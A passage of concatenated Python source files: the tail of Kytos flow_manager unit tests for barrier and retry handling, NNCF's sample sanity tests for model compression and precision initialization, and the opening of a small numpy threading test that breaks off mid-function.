self.napp._pending_barrier_max_size = max_size
assert len(self.napp._pending_barrier_reply[dpid]) == 0
for i in range(max_size + overflow):
self.napp._add_barrier_request(
dpid, barrier_xid_offset + i, flow_xid_offset + i
)
assert len(self.napp._pending_barrier_reply[dpid]) == max_size
for i in range(overflow, max_size + overflow):
assert i in self.napp._pending_barrier_reply[dpid]
for i in range(overflow):
assert i not in self.napp._pending_barrier_reply[dpid]
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_send_barrier_request(self, _):
"""Test send barrier request."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow_mod = MagicMock()
flow_mod.header.xid = 123
self.napp._send_barrier_request(switch, flow_mod)
assert (
list(self.napp._pending_barrier_reply[switch.id].values())[0]
== flow_mod.header.xid
)
@patch("napps.kytos.flow_manager.main.Main._publish_installed_flow")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_on_ofpt_barrier_reply(self, _, mock_publish):
"""Test on_ofpt barrier reply."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow_mod = MagicMock()
flow_mod.header.xid = 123
self.napp._send_barrier_request(switch, flow_mod)
assert (
list(self.napp._pending_barrier_reply[switch.id].values())[0]
== flow_mod.header.xid
)
barrier_xid = list(self.napp._pending_barrier_reply[switch.id].keys())[0]
self.napp._add_flow_mod_sent(flow_mod.header.xid, flow_mod, "add")
event = MagicMock()
event.message.header.xid = barrier_xid
assert barrier_xid
assert (
self.napp._pending_barrier_reply[switch.id][barrier_xid]
== flow_mod.header.xid
)
event.source.switch = switch
self.napp._on_ofpt_barrier_reply(event)
mock_publish.assert_called()
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_update_flow_state_store(self, mock_save_flow):
"""Test update flow state store."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"_id": "1",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.1",
},
},
}
stored_flow2 = {
"_id": "2",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.2",
},
},
}
cookie = 0
mock_save_flow.return_value = lambda x: x
self.napp.stored_flows = {dpid: {cookie: [stored_flow, stored_flow2]}}
assert len(self.napp.stored_flows[dpid][cookie]) == 2
self.napp._update_flow_state_store(dpid, ["1"], "installed")
assert len(self.napp.stored_flows[dpid][cookie]) == 2
expected = dict(stored_flow)
expected["state"] = "installed"
self.assertDictEqual(self.napp.stored_flows[dpid][cookie][0], expected)
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
def test_on_openflow_connection_error(self, mock_send_napp_event):
"""Test on_openflow_connection_error."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
mock = MagicMock()
mock.event.content = {"destination": switch}
self.napp._send_openflow_connection_error(mock)
mock_send_napp_event.assert_called()
@patch("napps.kytos.flow_manager.main.Main._update_flow_state_store")
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
def test_publish_installed_flows(self, mock_send_napp_event, mock_update_flow):
"""Test publish_installed_flows."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow1 = MagicMock()
flow1.id = "1"
flow2 = MagicMock()
flow2.id = "2"
switch.flows = [flow1, flow2]
stored_flow = {
"_id": "1",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.1",
},
},
}
stored_flow2 = {
"_id": "2",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.2",
},
},
}
cookie = 0
self.napp.stored_flows = {dpid: {cookie: [stored_flow, stored_flow2]}}
assert len(self.napp.stored_flows[dpid][cookie]) == 2
self.napp.publish_installed_flows(switch)
assert mock_send_napp_event.call_count == 2
assert mock_update_flow.call_count == 1
@patch("napps.kytos.flow_manager.main.Main._send_barrier_request")
def test_retry_on_openflow_connection_error(self, mock_barrier):
"""Test retry on openflow connection error."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow = MagicMock()
flow.as_dict.return_value = {}
flow.xid = 1
self.napp._flow_mods_sent[flow.xid] = (flow, "add")
mock_ev = MagicMock()
mock_ev.event.content = {"destination": switch}
min_wait = 0.2
multiplier = 2
assert self.napp._retry_on_openflow_connection_error(
mock_ev,
max_retries=3,
min_wait=min_wait,
multiplier=multiplier,
send_barrier=True,
)
(count, _, wait_acc) = self.napp._flow_mods_retry_count[flow.xid]
assert count == 1
assert wait_acc == min_wait * multiplier
assert mock_barrier.call_count == 1
@patch("napps.kytos.flow_manager.main.Main._send_openflow_connection_error")
def test_retry_on_openflow_connection_error_send_event(self, mock_send):
"""Test retry on openflow connection error send event."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow = MagicMock()
flow.as_dict.return_value = {}
flow.xid = 1
self.napp._flow_mods_sent[flow.xid] = (flow, "add")
# make sure a previous retry has stored executed
self.napp._flow_mods_retry_count[flow.xid] = (3, now(), 10)
mock_ev = MagicMock()
mock_ev.event.content = {"destination": switch}
min_wait = 0.2
assert not self.napp._retry_on_openflow_connection_error(
mock_ev,
max_retries=3,
min_wait=min_wait,
multiplier=2,
send_barrier=True,
)
assert mock_send.call_count == 1
def test_retry_on_openflow_connection_error_early_return(self):
"""Test retry on openflow connection error early returns."""
max_retries = 0
min_wait = 0.2
multiplier = 2
with self.assertRaises(ValueError) as exc:
self.napp._retry_on_openflow_connection_error(
{}, max_retries, min_wait, multiplier
)
assert "should be > 0" in str(exc.exception)
self.napp._flow_mods_sent = {}
mock = MagicMock()
with self.assertRaises(ValueError) as exc:
self.napp._retry_on_openflow_connection_error(
mock, max_retries + 1, min_wait, multiplier
)
assert "not found on flow mods sent" in str(exc.exception)
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
def test_send_openflow_connection_error(self, mock_send):
"""Test _send_openflow_connection_error."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow = MagicMock()
flow.as_dict.return_value = {}
flow.xid = 1
self.napp._flow_mods_sent[flow.xid] = (flow, "add")
mock_ev = MagicMock()
mock_ev.event.content = {"destination": switch}
self.napp._send_openflow_connection_error(mock_ev)
assert mock_send.call_count == 1
def test_build_flow_mod_from_command(self):
"""Test build_flow_mod_from_command."""
mock = MagicMock()
values = [
("add", mock.as_of_add_flow_mod),
("delete", mock.as_of_delete_flow_mod),
("delete_strict", mock.as_of_strict_delete_flow_mod),
]
for command, mock_method in values:
with self.subTest(command=command, mock_method=mock_method):
self.napp.build_flow_mod_from_command(mock, command)
assert mock_method.call_count == 1
with self.assertRaises(InvalidCommandError):
self.napp.build_flow_mod_from_command(mock, "invalid_command")
|
test_sanity_sample.py
|
"""
Copyright (c) 2019-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import shlex
import signal
import subprocess
import sys
import threading
import time
from enum import Enum, auto
from pathlib import Path
from typing import Dict
import os
import pytest
import tempfile
import torch
# pylint: disable=redefined-outer-name
from examples.common.optimizer import get_default_weight_decay
from examples.common.sample_config import SampleConfig
from examples.common.utils import get_name, is_staged_quantization
from nncf.compression_method_api import CompressionLevel
from nncf.config import NNCFConfig
from nncf.quantization.layers import QuantizerConfig
from tests.conftest import EXAMPLES_DIR, PROJECT_ROOT, TEST_ROOT
class Command:
def __init__(self, cmd, path=None):
self.cmd = cmd
self.process = None
self.exec_time = -1
self.output = [] # store output here
self.kwargs = {}
self.timeout = False
self.path = path
# set system/version dependent "start_new_session" analogs
if sys.platform == "win32":
self.kwargs.update(creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
elif sys.version_info < (3, 2): # assume posix
self.kwargs.update(preexec_fn=os.setsid)
else: # Python 3.2+ and Unix
self.kwargs.update(start_new_session=True)
def kill_process_tree(self, pid):
try:
if sys.platform != "win32":
os.killpg(pid, signal.SIGKILL)
else:
subprocess.call(['taskkill', '/F', '/T', '/PID', str(pid)])
except OSError as err:
print(err)
def run(self, timeout=3600, assert_returncode_zero=True):
def target():
start_time = time.time()
self.process = subprocess.Popen(self.cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True,
bufsize=1, cwd=self.path, **self.kwargs)
self.timeout = False
self.output = []
for line in self.process.stdout:
line = line.decode('utf-8')
self.output.append(line)
sys.stdout.write(line)
sys.stdout.flush()
self.process.stdout.close()
self.process.wait()
self.exec_time = time.time() - start_time
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
try:
print("Error: process taking too long to complete--terminating" + ", [ " + self.cmd + " ]")
self.kill_process_tree(self.process.pid)
self.exec_time = timeout
self.timeout = True
thread.join()
except OSError as e:
print(self.process.pid, "Exception when try to kill task by PID, " + e.strerror)
raise
returncode = self.process.wait()
print("Process returncode = " + str(returncode))
if assert_returncode_zero:
assert returncode == 0, "Process exited with a non-zero exit code {}; output:{}".format(
returncode,
"".join(self.output))
return returncode
def get_execution_time(self):
return self.exec_time
class ConfigFactory:
"""Allows to modify config file before test run"""
def __init__(self, base_config, config_path):
self.config = base_config
self.config_path = str(config_path)
def serialize(self):
with open(self.config_path, 'w') as f:
json.dump(self.config, f)
return self.config_path
def __getitem__(self, item):
return self.config[item]
def __setitem__(self, key, value):
self.config[key] = value
def create_command_line(args, sample_type):
python_path = PROJECT_ROOT.as_posix()
executable = EXAMPLES_DIR.joinpath(sample_type, 'main.py').as_posix()
cli_args = " ".join(key if val is None else "{} {}".format(key, val) for key, val in args.items())
return "PYTHONPATH={path} {python_exe} {main_py} {args}".format(
path=python_path, main_py=executable, args=cli_args, python_exe=sys.executable
)
SAMPLE_TYPES = ["classification", "semantic_segmentation", "object_detection"]
DATASETS = {
"classification": ["mock_32x32", "mock_32x32", "mock_32x32", "mock_32x32"],
"semantic_segmentation": ["camvid", "camvid"],
"object_detection": ["voc"],
}
CONFIGS = {
"classification": [TEST_ROOT.joinpath("data", "configs", "squeezenet1_1_cifar10_rb_sparsity_int8.json"),
TEST_ROOT.joinpath("data", "configs", "resnet18_cifar100_bin_xnor.json"),
TEST_ROOT.joinpath("data", "configs", "resnet18_cifar10_staged_quant.json"),
TEST_ROOT.joinpath("data", "configs", "resnet18_pruning_magnitude.json")],
"semantic_segmentation": [TEST_ROOT.joinpath("data", "configs", "unet_camvid_int8.json"),
TEST_ROOT.joinpath("data", "configs", "unet_camvid_rb_sparsity.json")],
"object_detection": [TEST_ROOT.joinpath("data", "configs", "ssd300_vgg_voc_int8.json")]
}
BATCHSIZE_PER_GPU = {
"classification": [256, 256, 256, 128],
"semantic_segmentation": [2, 2],
"object_detection": [128],
}
DATASET_PATHS = {
"classification": {
x: lambda dataset_root: dataset_root if dataset_root else os.path.join(
tempfile.gettempdir(), x) for x in DATASETS["classification"]
},
"semantic_segmentation": {
DATASETS["semantic_segmentation"][0]: lambda dataset_root: TEST_ROOT.joinpath("data", "mock_datasets",
"camvid"),
DATASETS["semantic_segmentation"][0]: lambda dataset_root: TEST_ROOT.joinpath("data", "mock_datasets", "camvid")
},
"object_detection": {
DATASETS["object_detection"][0]: lambda dataset_root: TEST_ROOT.joinpath("data", "mock_datasets", "voc")
},
}
CONFIG_PARAMS = list()
for sample_type in SAMPLE_TYPES:
for tpl in list(zip(CONFIGS[sample_type], DATASETS[sample_type], BATCHSIZE_PER_GPU[sample_type])):
CONFIG_PARAMS.append((sample_type,) + tpl)
def update_compression_algo_dict_with_reduced_bn_adapt_params(algo_dict):
if algo_dict["algorithm"] == "rb_sparsity":
return
if 'initializer' not in algo_dict:
algo_dict['initializer'] = {'batchnorm_adaptation': {'num_bn_adaptation_samples': 5,
'num_bn_forget_samples': 5}}
else:
algo_dict['initializer'].update({'batchnorm_adaptation': {'num_bn_adaptation_samples': 5,
'num_bn_forget_samples': 5}})
@pytest.fixture(params=CONFIG_PARAMS,
ids=["-".join([p[0], p[1].name, p[2], str(p[3])]) for p in CONFIG_PARAMS])
def config(request, dataset_dir):
sample_type, config_path, dataset_name, batch_size = request.param
dataset_path = DATASET_PATHS[sample_type][dataset_name](dataset_dir)
with config_path.open() as f:
jconfig = json.load(f)
if "checkpoint_save_dir" in jconfig.keys():
del jconfig["checkpoint_save_dir"]
# Use a reduced number of BN adaptation samples for speed
if "compression" in jconfig:
if isinstance(jconfig["compression"], list):
algos_list = jconfig["compression"]
for algo_dict in algos_list:
update_compression_algo_dict_with_reduced_bn_adapt_params(algo_dict)
else:
algo_dict = jconfig["compression"]
update_compression_algo_dict_with_reduced_bn_adapt_params(algo_dict)
jconfig["dataset"] = dataset_name
return {
"sample_type": sample_type,
'nncf_config': jconfig,
"model_name": jconfig["model"],
"dataset_path": dataset_path,
"batch_size": batch_size,
}
@pytest.fixture(scope="module")
def case_common_dirs(tmp_path_factory):
return {
"checkpoint_save_dir": str(tmp_path_factory.mktemp("models"))
}
@pytest.mark.parametrize(" multiprocessing_distributed",
(True, False),
ids=['distributed', 'dataparallel'])
def test_pretrained_model_eval(config, tmp_path, multiprocessing_distributed):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--mode": "test",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--dist-url": "tcp://127.0.0.1:8987"
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
runner.run()
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(name=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(name=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_pretrained_model_train(config, tmp_path, multiprocessing_distributed, case_common_dirs):
checkpoint_save_dir = os.path.join(case_common_dirs["checkpoint_save_dir"],
"distributed" if multiprocessing_distributed else "data_parallel")
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--mode": "train",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 2,
"--checkpoint-save-dir": checkpoint_save_dir,
"--dist-url": "tcp://127.0.0.1:8989"
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
runner.run()
last_checkpoint_path = os.path.join(checkpoint_save_dir, get_name(config_factory.config) + "_last.pth")
assert os.path.exists(last_checkpoint_path)
assert torch.load(last_checkpoint_path)['compression_level'] in (CompressionLevel.FULL, CompressionLevel.PARTIAL)
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_trained_model_eval(config, tmp_path, multiprocessing_distributed, case_common_dirs):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = os.path.join(case_common_dirs["checkpoint_save_dir"],
"distributed" if multiprocessing_distributed else "data_parallel",
get_name(config_factory.config) + "_last.pth")
args = {
"--mode": "test",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--weights": ckpt_path,
"--dist-url": "tcp://127.0.0.1:8987"
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
runner.run()
def get_resuming_checkpoint_path(config_factory, multiprocessing_distributed, checkpoint_save_dir):
return os.path.join(checkpoint_save_dir,
"distributed" if multiprocessing_distributed else "data_parallel",
get_name(config_factory.config) + "_last.pth")
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_resume(config, tmp_path, multiprocessing_distributed, case_common_dirs):
checkpoint_save_dir = os.path.join(str(tmp_path), "models")
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = get_resuming_checkpoint_path(config_factory, multiprocessing_distributed,
case_common_dirs["checkpoint_save_dir"])
if "max_iter" in config_factory.config:
config_factory.config["max_iter"] += 2
args = {
"--mode": "train",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 3,
"--checkpoint-save-dir": checkpoint_save_dir,
"--resume": ckpt_path,
"--dist-url": "tcp://127.0.0.1:8986"
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
runner.run()
last_checkpoint_path = os.path.join(checkpoint_save_dir, get_name(config_factory.config) + "_last.pth")
assert os.path.exists(last_checkpoint_path)
assert torch.load(last_checkpoint_path)['compression_level'] in (CompressionLevel.FULL, CompressionLevel.PARTIAL)
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_export_with_resume(config, tmp_path, multiprocessing_distributed, case_common_dirs):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = get_resuming_checkpoint_path(config_factory, multiprocessing_distributed,
case_common_dirs["checkpoint_save_dir"])
onnx_path = os.path.join(str(tmp_path), "model.onnx")
args = {
"--mode": "test",
"--config": config_factory.serialize(),
"--resume": ckpt_path,
"--to-onnx": onnx_path
}
runner = Command(create_command_line(args, config["sample_type"]))
runner.run()
assert os.path.exists(onnx_path)
def test_export_with_pretrained(tmp_path):
config = SampleConfig()
config.update({
"model": "resnet18",
"dataset": "imagenet",
"input_info": {
"sample_size": [2, 3, 299, 299]
},
"num_classes": 1000,
"compression": {"algorithm": "magnitude_sparsity"}
})
config_factory = ConfigFactory(config, tmp_path / 'config.json')
onnx_path = os.path.join(str(tmp_path), "model.onnx")
args = {
"--mode": "test",
"--config": config_factory.serialize(),
"--pretrained": '',
"--to-onnx": onnx_path
}
runner = Command(create_command_line(args, "classification"))
runner.run()
assert os.path.exists(onnx_path)
@pytest.mark.parametrize(('algo', 'ref_weight_decay'),
(('rb_sparsity', 0),
('const_sparsity', 1e-4),
('magnitude_sparsity', 1e-4),
('quantization', 1e-4)))
def test_get_default_weight_decay(algo, ref_weight_decay):
config = NNCFConfig()
config.update({"compression": {"algorithm": algo}})
assert ref_weight_decay == get_default_weight_decay(config)
def test_cpu_only_mode_produces_cpu_only_model(config, tmp_path, mocker):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 1,
"--cpu-only": None
}
# to prevent starting a not closed mlflow session due to memory leak of config and SafeMLFLow happens with a
# mocked train function
mocker.patch("examples.common.utils.SafeMLFLow")
command_line = " ".join(key if val is None else "{} {}".format(key, val) for key, val in args.items())
if config["sample_type"] == "classification":
import examples.classification.main as sample
mocked_printing = mocker.patch('examples.classification.main.print_statistics')
if is_staged_quantization(config['nncf_config']):
mocker.patch("examples.classification.staged_quantization_worker.train_epoch_staged")
mocker.patch("examples.classification.staged_quantization_worker.validate")
import examples.classification.staged_quantization_worker as staged_worker
mocked_printing = mocker.patch('examples.classification.staged_quantization_worker.print_statistics')
staged_worker.validate.return_value = (0, 0)
else:
mocker.patch("examples.classification.main.train_epoch")
mocker.patch("examples.classification.main.validate")
sample.validate.return_value = (0, 0)
elif config["sample_type"] == "semantic_segmentation":
import examples.semantic_segmentation.main as sample
mocked_printing = mocker.patch('examples.semantic_segmentation.main.print_statistics')
import examples.semantic_segmentation.train
mocker.spy(examples.semantic_segmentation.train.Train, "__init__")
elif config["sample_type"] == "object_detection":
import examples.object_detection.main as sample
mocker.spy(sample, "train")
mocked_printing = mocker.patch('examples.object_detection.main.print_statistics')
sample.main(shlex.split(command_line))
if not config["sample_type"] == "object_detection":
assert mocked_printing.call_count == 2
else:
assert mocked_printing.call_count == 3
# pylint: disable=no-member
if config["sample_type"] == "classification":
if is_staged_quantization(config['nncf_config']):
import examples.classification.staged_quantization_worker as staged_worker
model_to_be_trained = staged_worker.train_epoch_staged.call_args[0][2] # model
else:
model_to_be_trained = sample.train_epoch.call_args[0][1] # model
elif config["sample_type"] == "semantic_segmentation":
model_to_be_trained = examples.semantic_segmentation.train.Train.__init__.call_args[0][1] # model
elif config["sample_type"] == "object_detection":
model_to_be_trained = sample.train.call_args[0][0] # net
for p in model_to_be_trained.parameters():
assert not p.is_cuda
class SampleType(Enum):
CLASSIFICATION = auto()
SEMANTIC_SEGMENTATION = auto()
OBJECT_DETECTION = auto()
class TestCaseDescriptor:
config_name: str
quantization_algo_params: Dict = {}
sample_type: SampleType
dataset_dir: Path
dataset_name: str
is_real_dataset: bool = False
batch_size: int
n_weight_quantizers: int
n_activation_quantizers: int
def batch(self, batch_size: int):
self.batch_size = batch_size
return self
def get_config_path(self):
return TEST_ROOT.joinpath("data", "configs", "hawq", self.config_name)
def config(self, config_name: str):
self.config_name = config_name
return self
def staged(self):
self.quantization_algo_params = {
"activations_quant_start_epoch": 0
}
return self
def sample(self, sample_type: SampleType):
self.sample_type = sample_type
return self
def real_dataset(self, dataset_name: str):
self.dataset_name = dataset_name
self.is_real_dataset = True
return self
def mock_dataset(self, dataset_name: str):
self.dataset_name = dataset_name
self.dataset_dir = TEST_ROOT.joinpath("data", "mock_datasets", dataset_name)
return self
def num_weight_quantizers(self, n: int):
self.n_weight_quantizers = n
return self
def num_activation_quantizers(self, n: int):
self.n_activation_quantizers = n
return self
def __str__(self):
return '_'.join([self.config_name, 'staged' if self.quantization_algo_params else ''])
def get_config_update(self) -> Dict:
sample_params = self.get_sample_params()
return {
**sample_params,
'target_device': 'VPU',
'compression': {
'algorithm': 'quantization',
'initializer': {
'precision': self.get_precision_section(),
'range': {
"num_init_samples": 2
},
"batchnorm_adaptation": {
"num_bn_adaptation_samples": 1,
"num_bn_forget_samples": 1
}
},
'params': self.quantization_algo_params,
}
}
def get_precision_section(self) -> Dict:
raise NotImplementedError
def get_sample_params(self) -> Dict:
return {"dataset": self.dataset_name}
def setup_spy(self, mocker):
raise NotImplementedError
def validate_spy(self):
raise NotImplementedError
class HAWQDescriptor(TestCaseDescriptor):
batch_size_init: int = 0
set_chosen_config_spy = None
hessian_trace_estimator_spy = None
def batch_for_init(self, batch_size_init: int):
self.batch_size_init = batch_size_init
return self
def get_sample_params(self):
result = super().get_sample_params()
result.update({'batch_size_init': self.batch_size_init} if self.batch_size_init else {})
return result
def get_precision_section(self) -> Dict:
return {"type": "hawq",
"num_data_points": 3,
"iter_number": 1}
def __str__(self):
bs = f'_bs{self.batch_size_init}' if self.batch_size_init else ''
return super().__str__() + '_hawq' + bs
def setup_spy(self, mocker):
from nncf.quantization.init_precision import HAWQPrecisionInitializer
self.set_chosen_config_spy = mocker.spy(HAWQPrecisionInitializer, "set_chosen_config")
from nncf.quantization.hessian_trace import HessianTraceEstimator
self.hessian_trace_estimator_spy = mocker.spy(HessianTraceEstimator, "__init__")
def validate_spy(self):
bitwidth_list = self.set_chosen_config_spy.call_args[0][1]
assert len(bitwidth_list) == self.n_weight_quantizers
# with default compression ratio = 1.5 all precisions should be different from the default one
assert set(bitwidth_list) != {QuantizerConfig().bits}
init_data_loader = self.hessian_trace_estimator_spy.call_args[0][5]
expected_batch_size = self.batch_size_init if self.batch_size_init else self.batch_size
assert init_data_loader.batch_size == expected_batch_size
class AutoQDescriptor(TestCaseDescriptor):
subset_ratio_: float = 1.0
BITS = [2, 4, 8]
def subset_ratio(self, subset_ratio_: float):
self.subset_ratio_ = subset_ratio_
return self
def get_precision_section(self) -> Dict:
return {"type": "autoq",
"bits": AutoQDescriptor.BITS,
"iter_number": 2,
"compression_ratio": 0.15,
"eval_subset_ratio": self.subset_ratio_}
def __str__(self):
sr = f'_sr{self.subset_ratio_}' if self.subset_ratio_ else ''
return super().__str__() + '_autoq' + sr
def setup_spy(self, mocker):
from nncf.nncf_network import NNCFNetwork
self.commit_compression_changes_spy = mocker.spy(NNCFNetwork, 'commit_compression_changes')
def validate_spy(self):
ctrl = self.commit_compression_changes_spy.spy_return
final_bits = [qm.num_bits for qm in ctrl.all_quantizations.values()]
assert set(final_bits) != {QuantizerConfig().bits}
assert all([bit in AutoQDescriptor.BITS for bit in final_bits])
def resnet18_desc(x: TestCaseDescriptor):
return x.config("resnet18_cifar10_mixed_int.json").sample(SampleType.CLASSIFICATION). \
mock_dataset('mock_32x32').batch(3).num_weight_quantizers(21).num_activation_quantizers(27)
def inception_v3_desc(x: TestCaseDescriptor):
return x.config("inception_v3_cifar10_mixed_int.json").sample(SampleType.CLASSIFICATION). \
mock_dataset('mock_32x32').batch(3).num_weight_quantizers(95).num_activation_quantizers(105)
def ssd300_vgg_desc(x: TestCaseDescriptor):
return x.config("ssd300_vgg_voc_mixed_int.json").sample(SampleType.OBJECT_DETECTION). \
mock_dataset('voc').batch(3).num_weight_quantizers(35).num_activation_quantizers(27)
def unet_desc(x: TestCaseDescriptor):
return x.config("unet_camvid_mixed_int.json").sample(SampleType.SEMANTIC_SEGMENTATION). \
mock_dataset('camvid').batch(3).num_weight_quantizers(23).num_activation_quantizers(23)
def icnet_desc(x: TestCaseDescriptor):
return x.config("icnet_camvid_mixed_int.json").sample(SampleType.SEMANTIC_SEGMENTATION). \
mock_dataset('camvid').batch(3).num_weight_quantizers(64).num_activation_quantizers(81)
TEST_CASE_DESCRIPTORS = [
inception_v3_desc(HAWQDescriptor()),
inception_v3_desc(HAWQDescriptor()).staged(),
resnet18_desc(HAWQDescriptor()),
resnet18_desc(HAWQDescriptor()).staged(),
resnet18_desc(HAWQDescriptor()).batch_for_init(2),
resnet18_desc(HAWQDescriptor()).batch_for_init(2).staged(),
ssd300_vgg_desc(HAWQDescriptor()),
ssd300_vgg_desc(HAWQDescriptor()).batch_for_init(2),
unet_desc(HAWQDescriptor()),
unet_desc(HAWQDescriptor()).batch_for_init(2),
icnet_desc(HAWQDescriptor()),
inception_v3_desc(AutoQDescriptor()).batch(2),
inception_v3_desc(AutoQDescriptor()).staged(),
resnet18_desc(AutoQDescriptor()).batch(2),
resnet18_desc(AutoQDescriptor()).batch(2).staged(),
resnet18_desc(AutoQDescriptor()).subset_ratio(0.2).batch(2),
resnet18_desc(AutoQDescriptor()).subset_ratio(0.2).staged(),
ssd300_vgg_desc(AutoQDescriptor()),
unet_desc(AutoQDescriptor()),
icnet_desc(AutoQDescriptor())
]
@pytest.fixture(params=TEST_CASE_DESCRIPTORS, ids=[str(d) for d in TEST_CASE_DESCRIPTORS])
def desc(request, dataset_dir):
desc: TestCaseDescriptor = request.param
config_path = desc.get_config_path()
with config_path.open() as file:
json_config = json.load(file)
json_config.update(desc.get_config_update())
desc.config = json_config
if desc.is_real_dataset:
desc.dataset_dir = Path(
dataset_dir if dataset_dir else os.path.join(tempfile.gettempdir(), desc.dataset_name))
return desc
def test_precision_init(desc: TestCaseDescriptor, tmp_path, mocker):
config_factory = ConfigFactory(desc.config, tmp_path / 'config.json')
args = {
"--data": str(desc.dataset_dir),
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": desc.batch_size,
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
}
command_line = " ".join(f'{key} {val}' for key, val in args.items())
# Need to mock SafeMLFLow to prevent starting a not closed mlflow session due to memory leak of config and
# SafeMLFLow, which happens with a mocked train function
if desc.sample_type == SampleType.CLASSIFICATION:
import examples.classification.main as sample
mocker.patch("examples.classification.staged_quantization_worker.train_staged")
mocker.patch("examples.classification.main.train")
mocker.patch("examples.classification.main.SafeMLFLow")
mocker.patch("examples.classification.staged_quantization_worker.SafeMLFLow")
elif desc.sample_type == SampleType.SEMANTIC_SEGMENTATION:
import examples.semantic_segmentation.main as sample
mocker.patch("examples.semantic_segmentation.main.train")
mocker.patch("examples.semantic_segmentation.main.SafeMLFLow")
elif desc.sample_type == SampleType.OBJECT_DETECTION:
import examples.object_detection.main as sample
mocker.patch("examples.object_detection.main.train")
mocker.patch("examples.object_detection.main.SafeMLFLow")
desc.setup_spy(mocker)
sample.main(shlex.split(command_line))
desc.validate_spy()
|
threading_test.py
|
from __future__ import division, print_function
from threading import Thread, Lock
import numpy as np
import scipy.linalg as la
class aa(object):
def __init__(self, i):
self.i=i
def f(self, l, myarr):
myarr[self.i]=self.i
myarr[self.i+1]=self.i
l.acquire()
print('hello world {0:d}'.format(self.i))
l.release()
nbig = 1000
niter = 20
global_vect = np.random.random(nbig)
def do_lots(big_matrix):
for i in range(niter):
